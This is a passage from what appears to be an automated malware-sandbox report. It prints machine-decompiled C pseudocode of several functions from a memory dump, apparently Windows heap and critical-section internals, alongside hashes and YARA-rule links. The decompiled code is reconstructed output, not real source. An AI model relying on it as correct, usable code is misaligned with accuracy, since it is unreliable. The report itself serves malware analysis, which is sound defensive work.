				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x1e496110; // 0xc15d2e02
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E1E472E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x1e496110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E1E472E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x1e496110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E1E472E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x1e496110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x1e496110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}





















                                        0x1e4720a8
                                        0x1e4720b0
                                        0x1e4720b6
                                        0x1e4720ba
                                        0x1e4720be
                                        0x1e4720c4
                                        0x1e4720cb
                                        0x1e4720db
                                        0x1e4720e4
                                        0x1e4720e7
                                        0x1e4720e9
                                        0x1e4720ef
                                        0x1e4720f1
                                        0x1e4720fe
                                        0x1e472102
                                        0x1e472105
                                        0x1e472105
                                        0x1e472107
                                        0x1e47210d
                                        0x1e472112
                                        0x1e472115
                                        0x1e472120
                                        0x1e472120
                                        0x1e472107
                                        0x1e472126
                                        0x1e472131
                                        0x1e472133
                                        0x1e47213e
                                        0x1e47213e
                                        0x1e472140
                                        0x1e472146
                                        0x1e47214b
                                        0x1e472156
                                        0x1e472156
                                        0x1e472140
                                        0x1e47215f
                                        0x1e472165
                                        0x1e472170
                                        0x1e472172
                                        0x1e47217d
                                        0x1e47217d
                                        0x1e47217f
                                        0x1e472185
                                        0x1e472192
                                        0x1e472192
                                        0x1e47217f
                                        0x1e472170
                                        0x1e472197
                                        0x1e472199
                                        0x1e4721a1
                                        0x1e4721b1
                                        0x1e4721bf
                                        0x1e4721d6
                                        0x1e4721d6
                                        0x1e4721bf
                                        0x1e4721dd
                                        0x1e4721e5

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2408d3c1ca44d824d5cec0eb0655fa06647f8c0aca1712006effb27960f9e468
                                        • Instruction ID: 91289e9b3362289ef518821740720981c83df55ef1accae0ccad59135934b566
                                        • Opcode Fuzzy Hash: 2408d3c1ca44d824d5cec0eb0655fa06647f8c0aca1712006effb27960f9e468
                                        • Instruction Fuzzy Hash: 1E418473E1402A8BCB18CF64C4915BAB3F1FB4870575642BED815AB255DB34BD41CBD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E472D07, Relevance: .1, Instructions: 112COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E1E472D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E1E4721E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x1e38ac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x1e38ac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x1e38ac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x1e38ac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x1e38ac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x1e496110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x1e496110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x1e496110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E1E3BB090(_v24, _t91, _v12, _t29);
			}
























                                        0x1e472d1f
                                        0x1e472d2c
                                        0x1e472d31
                                        0x1e472d33
                                        0x1e472d42
                                        0x1e472d4b
                                        0x1e472d51
                                        0x1e472d5d
                                        0x1e472d62
                                        0x1e472d6e
                                        0x1e472d71
                                        0x1e472d7d
                                        0x1e472d87
                                        0x1e472d8d
                                        0x1e472d91
                                        0x1e472da5
                                        0x1e472db7
                                        0x1e472dc8
                                        0x1e472dcf
                                        0x1e472dd1
                                        0x1e472dd3
                                        0x1e472dd6
                                        0x1e472ddb
                                        0x1e472ddd
                                        0x00000000
                                        0x1e472ddf
                                        0x1e472df5
                                        0x1e472e0e
                                        0x1e472e12
                                        0x1e472e1a
                                        0x1e472e1c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e472e14
                                        0x1e472e16
                                        0x1e472e22
                                        0x1e472e22
                                        0x1e472e18
                                        0x1e472e18
                                        0x00000000
                                        0x1e472e18
                                        0x1e472e16
                                        0x1e472df7
                                        0x1e472df7
                                        0x1e472dfc
                                        0x1e472e04
                                        0x1e472e06
                                        0x1e472e1e
                                        0x1e472e1e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e472dfe
                                        0x1e472e00
                                        0x1e472e08
                                        0x1e472e08
                                        0x1e472e02
                                        0x1e472e02
                                        0x00000000
                                        0x1e472e02
                                        0x1e472e00
                                        0x1e472dfc
                                        0x00000000
                                        0x1e472df5
                                        0x1e472ddf
                                        0x1e472e26
                                        0x1e472e26
                                        0x1e472e3c

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfd0913ada339ce95b672f3707e3b9f36b80f64b2f389d289e17ba6a35c63c5c
                                        • Instruction ID: 0c7eb00457a3679edd3c2642be1a297abae6b3a4398d53debf40ae9d7df9a310
                                        • Opcode Fuzzy Hash: cfd0913ada339ce95b672f3707e3b9f36b80f64b2f389d289e17ba6a35c63c5c
                                        • Instruction Fuzzy Hash: CA4129719041654FC749CB66C8A0AFA7FF1FF85201B1642EBD881EB242DA38D546D7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E472EF7, Relevance: .1, Instructions: 72COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E1E472EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x1e49d360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E1E3ED0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E1E3ED0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E1E3C2280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x1e49b1e0();
						 *( *(_t106 + 0x30) ^  *0x1e496110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x1e49b1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x1e496110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E1E3BFFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E1E3EB640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x1e38ac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x1e38ac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}






































                                        0x1e472efc
                                        0x1e472efd
                                        0x1e472eff
                                        0x1e472f03
                                        0x1e472f0a
                                        0x1e472f0c
                                        0x1e472f15
                                        0x1e472fba
                                        0x1e472fbb
                                        0x1e472fc5
                                        0x1e472fcd
                                        0x1e472fcf
                                        0x1e472fd3
                                        0x1e472fd4
                                        0x1e472fd5
                                        0x1e472fd7
                                        0x1e472fda
                                        0x1e472fdb
                                        0x1e472fdd
                                        0x1e472fe0
                                        0x1e472fe2
                                        0x1e472ffc
                                        0x1e472fe4
                                        0x1e472fe4
                                        0x1e472fea
                                        0x1e472fed
                                        0x1e472fef
                                        0x1e472ff6
                                        0x1e472ff1
                                        0x1e472ff1
                                        0x1e472ff1
                                        0x1e472fef
                                        0x1e472fff
                                        0x1e473001
                                        0x1e47301b
                                        0x1e473003
                                        0x1e473003
                                        0x1e47300e
                                        0x1e473015
                                        0x1e473010
                                        0x1e473010
                                        0x1e473010
                                        0x1e473010
                                        0x1e47300e
                                        0x1e47302c
                                        0x1e473035
                                        0x1e47303c
                                        0x1e473046
                                        0x1e47304e
                                        0x1e473056
                                        0x1e47305a
                                        0x1e47305e
                                        0x1e473063
                                        0x1e473067
                                        0x1e47306b
                                        0x1e47306f
                                        0x1e473072
                                        0x1e4730af
                                        0x1e4730b5
                                        0x1e4730c1
                                        0x1e4730c9
                                        0x1e4730c9
                                        0x1e4730c9
                                        0x00000000
                                        0x1e473074
                                        0x1e473081
                                        0x1e473089
                                        0x1e47308b
                                        0x1e47308d
                                        0x1e473093
                                        0x1e47309a
                                        0x1e4730ce
                                        0x1e4730d1
                                        0x1e4730d5
                                        0x1e4730d5
                                        0x1e4730d5
                                        0x1e47308d
                                        0x1e4730db
                                        0x1e4730e6
                                        0x1e4730e7
                                        0x1e4730e8
                                        0x1e4730e9
                                        0x1e4730f3
                                        0x1e472f27
                                        0x1e472f29
                                        0x1e472f2b
                                        0x1e472f2d
                                        0x1e472f36
                                        0x1e472f3d
                                        0x1e472f4c
                                        0x1e472f58
                                        0x1e472fad
                                        0x1e472fb7
                                        0x1e472fb7

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4aaafbcb89aa5b542132b5573ca7a3347e7574ab2d4af81911cb69adf12a8bb4
                                        • Instruction ID: 518e556eb0e9a2ab83d72e5dfca275952ca86c127d810fbea33c46b1ee6645f2
                                        • Opcode Fuzzy Hash: 4aaafbcb89aa5b542132b5573ca7a3347e7574ab2d4af81911cb69adf12a8bb4
                                        • Instruction Fuzzy Hash: C121DD712041500FD745CF1AC8E09B6BFF5EFC611275682F6D984EF742C9289417D7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E471FF1, Relevance: .1, Instructions: 70COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E1E471FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x1e496110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x1e496110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x1e496110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x1e496110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}












                                        0x1e471ff9
                                        0x1e471ffc
                                        0x1e472001
                                        0x1e47200d
                                        0x1e47201b
                                        0x1e472028
                                        0x1e47202e
                                        0x1e472035
                                        0x1e472038
                                        0x1e47204c
                                        0x1e472052
                                        0x1e472053
                                        0x1e472054
                                        0x1e472055
                                        0x1e472069
                                        0x1e47206c
                                        0x1e47206e
                                        0x1e472079
                                        0x1e472087
                                        0x1e47209c
                                        0x1e47209c
                                        0x1e47202a
                                        0x1e47202a
                                        0x1e47202a
                                        0x1e4720a5

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f69c954eea6c3f8ec6af87ea8f4fdc6b745dc70bddd99a598fa8ef5e677e3a8
                                        • Instruction ID: 3ebd6286762f97805d0898d12143836c04d6565cd6a34d39fd6b9f7e305a367b
                                        • Opcode Fuzzy Hash: 6f69c954eea6c3f8ec6af87ea8f4fdc6b745dc70bddd99a598fa8ef5e677e3a8
                                        • Instruction Fuzzy Hash: 2721A233A104259BDB18CF7CC8055A6F7E6FF9C21032A467BD912EB265EA70BD11CAC4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3B841F, Relevance: .1, Instructions: 64COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E1E3B841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E1E3E9810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}













                                        0x1e3b842f
                                        0x1e3b8448
                                        0x1e3b844e
                                        0x1e3b8459
                                        0x1e3b845b
                                        0x1e3b8464
                                        0x1e409ac3
                                        0x1e409ac3
                                        0x1e409ac5
                                        0x1e409acb
                                        0x00000000
                                        0x00000000
                                        0x1e409acd
                                        0x1e409acd
                                        0x1e409ad1
                                        0x1e409ae9
                                        0x1e3b846a
                                        0x1e3b8475
                                        0x1e3b8479
                                        0x1e3b847c
                                        0x1e3b8481
                                        0x1e3b8482
                                        0x1e3b849a

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                        • Instruction ID: 5a997e8936a07a3d5e6ed4091dd66b87fb4ad1fcba47ec51653e3f89f3374aeb
                                        • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                        • Instruction Fuzzy Hash: 2C21A276E00119CBCB14CFA9C58068AF3F9FB8C350F664565E909B7740C630AE04CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3D645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 26%
                                        			E1E3D645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e49d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E3EFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E3C2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E3BFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e49b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E3EB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                        0x1e3d645b
                                        0x1e3d6463
                                        0x1e3d646d
                                        0x1e3d6475
                                        0x1e3d647a
                                        0x1e3d647e
                                        0x1e3d6480
                                        0x1e3d648c
                                        0x1e3d6490
                                        0x1e3d6495
                                        0x1e3d6498
                                        0x1e3d649b
                                        0x1e3d649f
                                        0x1e3d64a1
                                        0x1e417c07
                                        0x1e417c09
                                        0x1e417c0c
                                        0x00000000
                                        0x1e3d64a7
                                        0x1e3d64a7
                                        0x1e3d64aa
                                        0x1e417bf7
                                        0x1e417c00
                                        0x00000000
                                        0x1e417bf9
                                        0x1e417bf9
                                        0x1e417bf9
                                        0x1e3d64b0
                                        0x1e3d64b0
                                        0x1e3d64b2
                                        0x1e3d64b2
                                        0x1e3d64b3
                                        0x1e3d64ba
                                        0x1e3d6553
                                        0x1e3d655e
                                        0x1e3d6566
                                        0x1e3d656c
                                        0x1e3d6575
                                        0x1e3d657f
                                        0x1e3d6585
                                        0x1e3d6588
                                        0x1e3d6588
                                        0x1e3d64c7
                                        0x1e3d64cb
                                        0x1e3d64ce
                                        0x1e3d64d3
                                        0x1e3d64da
                                        0x1e3d64e5
                                        0x1e3d64ed
                                        0x1e3d64f1
                                        0x1e3d64f5
                                        0x1e3d64f6
                                        0x1e3d64fa
                                        0x1e3d6502
                                        0x1e3d6503
                                        0x1e3d6504
                                        0x1e3d6507
                                        0x1e3d651a
                                        0x1e3d6524
                                        0x1e3d6524
                                        0x1e3d6526
                                        0x1e3d6526
                                        0x1e3d64aa
                                        0x1e3d652c
                                        0x1e3d652d
                                        0x1e3d652e
                                        0x1e3d6539

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: 0$0
                                        • API String ID: 3446177414-203156872
                                        • Opcode ID: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
                                        • Instruction ID: c6ce05866ed0a428c24516c3888f241f737f9b2715814094d67d7a417fdcff41
                                        • Opcode Fuzzy Hash: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
                                        • Instruction Fuzzy Hash: 52415BB26047469FC301CF28C484A1ABBE5BB8D714F454A6EF899DB301D731EA49CB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E43FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E1E43FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E3ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E435720(0x65, "true", "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E435720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                        0x1e43fdda
                                        0x1e43fde2
                                        0x1e43fde5
                                        0x1e43fdec
                                        0x1e43fdfa
                                        0x1e43fdff
                                        0x1e43fe0a
                                        0x1e43fe0f
                                        0x1e43fe17
                                        0x1e43fe1e
                                        0x1e43fe19
                                        0x1e43fe19
                                        0x1e43fe19
                                        0x1e43fe20
                                        0x1e43fe21
                                        0x1e43fe22
                                        0x1e43fe25
                                        0x1e43fe40

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E43FDFA
                                        Strings
